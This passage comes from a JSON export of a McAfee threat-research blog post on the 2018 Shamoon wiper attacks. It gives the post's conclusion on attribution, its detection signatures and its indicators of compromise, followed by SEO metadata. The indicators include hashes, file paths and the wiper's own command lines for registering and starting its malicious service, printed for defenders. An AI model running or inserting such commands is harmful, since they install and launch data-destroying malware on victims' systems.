src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-26.png\" alt=\"\" width=\"365\" height=\"215\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-26.png 365w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/20181219-Shamoon-26-300x177.png 300w\" sizes=\"auto, (max-width: 365px) 100vw, 365px\" \/><\/a><\/p>\n<h2>Conclusion<\/h2>\n<p>In the 2017 wave of Shamoon attacks, we saw two wipers; we see a similar feature in the December 2018 attacks. Using the \u201ctool kit\u201d approach, the attackers can spread the wiper module through the victims\u2019 networks. The wiper is not obfuscated and is written in .Net code, unlike the Shamoon Version 3 code, which is encrypted to mask its hidden features.<\/p>\n<p>Attributing this attack is difficult because we do not have all the pieces of the puzzle. We do see that this attack is in line with the Shamoon Version 2 techniques. Political statements have been a part of every Shamoon attack. In Version 1, the image of a burning American flag was used to overwrite the files. In Version 2, the picture of a drowned Syrian boy was used, with a hint of Yemeni Arabic, referring to the conflicts in Syria and Yemen. Now we see a verse from the Quran, which might indicate that the adversary is related to another Middle Eastern conflict and wants to make a statement.<\/p>\n<p>When we look at the tools, techniques, and procedures used during the multiple waves, and by matching the domains and tools used (as FireEye described in its <a href=\"https:\/\/www.fireeye.com\/blog\/threat-research\/2017\/09\/apt33-insights-into-iranian-cyber-espionage.html\">report<\/a>), we conclude that APT33 or a group attempting to appear to be APT33 is behind these attacks.<\/p>\n<p>&nbsp;<\/p>\n<h2><strong>Coverage<\/strong><\/h2>\n<p>The files we detected during this incident are covered by the following signatures:<\/p>\n<ul>\n<li>Trojan-Wiper<\/li>\n<li>RDN\/Generic.dx<\/li>\n<li>RDN\/Ransom<\/li>\n<\/ul>\n<h2><strong>Indicators of compromise<\/strong><\/h2>\n<p><strong>Hashes<\/strong><\/p>\n<ul>\n<li>OCLC.exe: f972d776d7dabf9f978dc4cc4f69d88e715541ff<\/li>\n<li>Spreader.exe: 0104e42d1d6522f6170ca4aa42fcbf70f7390a74<\/li>\n<li>SpreaderPsexec.exe: cb8faa97e94c3c60b680e28eb6a2d3910d1ce466<\/li>\n<li>Slhost.exe: 3eab7112e94f9ec1e07b9ae4696052a7cf123bba<\/li>\n<\/ul>\n<p><strong>File paths and filenames<\/strong><\/p>\n<ul>\n<li>C:\\net2\\<\/li>\n<li>C:\\all\\<\/li>\n<li>C:\\net4\\<\/li>\n<li>C:\\windows\\system32\\<\/li>\n<li>C:\\\\Windows\\System32\\Program Files\\Internet Explorer\\Signing<\/li>\n<li>\\\\admin$\\process.bat<\/li>\n<li>NothingFound.txt<\/li>\n<li>MaintenaceSrv32.exe<\/li>\n<li>MaintenaceSrv64.exe<\/li>\n<li>SlHost.exe<\/li>\n<li>OCLC.exe<\/li>\n<li>Spreader.exe<\/li>\n<li>SpreaderPsexec.exe<\/li>\n<\/ul>\n<p><strong>Some command lines<\/strong><\/p>\n<ul>\n<li>cmd.exe \/c &#8220;&#8221;C:\\Program Files\\Internet Explorer\\signin\\MaintenaceSrv32.bat<\/li>\n<li>cmd.exe \/c &#8220;ping -n 30 127.0.0.1 &gt;nul &amp;&amp; sc config MaintenaceSrv binpath= C:\\windows\\system32\\MaintenaceSrv64.exe LocalService&#8221; &amp;&amp; ping -n 10 127.0.0.1 &gt;nul &amp;&amp; sc start MaintenaceSrv<\/li>\n<li>MaintenaceSrv32.exe LocalService<\/li>\n<li>cmd.exe \/c &#8220;&#8221;C:\\Program Files\\Internet Explorer\\signin\\MaintenaceSrv32.bat &#8221; &#8220;<\/li>\n<li>MaintenaceSrv32.exe service<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks&#8230;<\/p>\n","protected":false},"author":839,"featured_media":93315,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[1411,5526,338,180,4185],"coauthors":[4688,5349,3576],"class_list":["post-93278","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs","tag-advanced-persistent-threats","tag-advanced-threat-research","tag-endpoint-protection","tag-malware","tag-phishing"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2018-12-19T21:45:13+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-02-20T06:05:55+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2048\" \/>\n\t<meta property=\"og:image:height\" content=\"1365\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Thomas Roccia, Jessica Saavedra-Morales, Christiaan Beek\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@fr0gger_\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Thomas Roccia, Jessica Saavedra-Morales, Christiaan Beek\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/\"},\"author\":{\"name\":\"Thomas Roccia\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/84a85fe82c49f836915869700f5168e7\"},\"headline\":\"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems\",\"datePublished\":\"2018-12-19T21:45:13+00:00\",\"dateModified\":\"2024-02-20T06:05:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/\"},\"wordCount\":1579,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg\",\"keywords\":[\"advanced persistent threats\",\"Advanced Threat Research\",\"endpoint protection\",\"malware\",\"Phishing\"],\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/\",\"name\":\"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg\",\"datePublished\":\"2018-12-19T21:45:13+00:00\",\"dateModified\":\"2024-02-20T06:05:55+00:00\",\"description\":\"Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg\",\"width\":2048,\"height\":1365},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/84a85fe82c49f836915869700f5168e7\",\"name\":\"Thomas Roccia\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/219099eb1ee40018f72bf1e381c6bd75\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/08\/2-1-96x96.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/08\/2-1-96x96.png\",\"caption\":\"Thomas Roccia\"},\"description\":\"Thomas Roccia is senior security researcher on the Advanced Threat Research team. He works on threat intelligence, tracking cybercrime campaigns and collaborating with law enforcement agencies. In a previous role, Thomas worked on the McAfee Foundstone team, performing worldwide incident response, malware hunting, and penetration testing. He has helped customers during major outbreaks and managed highly critical situations. Thomas has developed workshops, training courses, presentations, he leads the Unprotect Project, an open-source database dedicated to malware evasion techniques. His work in security research includes threat intelligence, malware, reverse engineering, vulnerabilities as well as innovation and patenting. He speaks regularly at security conferences.\",\"sameAs\":[\"http:\/\/troccia.tdgt.org\",\"https:\/\/www.linkedin.com\/in\/thomas-roccia\/\",\"https:\/\/x.com\/fr0gger_\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/thomas-roccia\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems | McAfee Blog","description":"Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems | McAfee Blog","og_description":"Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2018-12-19T21:45:13+00:00","article_modified_time":"2024-02-20T06:05:55+00:00","og_image":[{"width":2048,"height":1365,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg","type":"image\/jpeg"}],"author":"Thomas Roccia, Jessica Saavedra-Morales, Christiaan Beek","twitter_card":"summary_large_image","twitter_creator":"@fr0gger_","twitter_site":"@McAfee","twitter_misc":{"Written by":"Thomas Roccia, Jessica Saavedra-Morales, Christiaan Beek","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/"},"author":{"name":"Thomas Roccia","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/84a85fe82c49f836915869700f5168e7"},"headline":"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems","datePublished":"2018-12-19T21:45:13+00:00","dateModified":"2024-02-20T06:05:55+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/"},"wordCount":1579,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg","keywords":["advanced persistent threats","Advanced Threat Research","endpoint protection","malware","Phishing"],"articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/","name":"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg","datePublished":"2018-12-19T21:45:13+00:00","dateModified":"2024-02-20T06:05:55+00:00","description":"Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon \u201cwiper\u201d malware attacks that struck several companies in","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/12\/web-page-generic-javascript-code-on-computer-monitor.jpg","width":2048,"height":1365},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/84a85fe82c49f836915869700f5168e7","name":"Thomas Roccia","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/219099eb1ee40018f72bf1e381c6bd75","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/08\/2-1-96x96.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/08\/2-1-96x96.png","caption":"Thomas Roccia"},"description":"Thomas Roccia is senior security researcher on the Advanced Threat Research team. He works on threat intelligence, tracking cybercrime campaigns and collaborating with law enforcement agencies. In a previous role, Thomas worked on the McAfee Foundstone team, performing worldwide incident response, malware hunting, and penetration testing. He has helped customers during major outbreaks and managed highly critical situations. Thomas has developed workshops, training courses, presentations, he leads the Unprotect Project, an open-source database dedicated to malware evasion techniques. His work in security research includes threat intelligence, malware, reverse engineering, vulnerabilities as well as innovation and patenting. He speaks regularly at security conferences.","sameAs":["http:\/\/troccia.tdgt.org","https:\/\/www.linkedin.com\/in\/thomas-roccia\/","https:\/\/x.com\/fr0gger_"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/thomas-roccia\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/93278","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/839"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=93278"}],"version-history":[{"count":1,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/93278\/revisions"}],"predecessor-version":[{"id":183172,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/93278\/revisions\/183172"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/93315"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=93278"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=93278"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=93278"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=93278"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}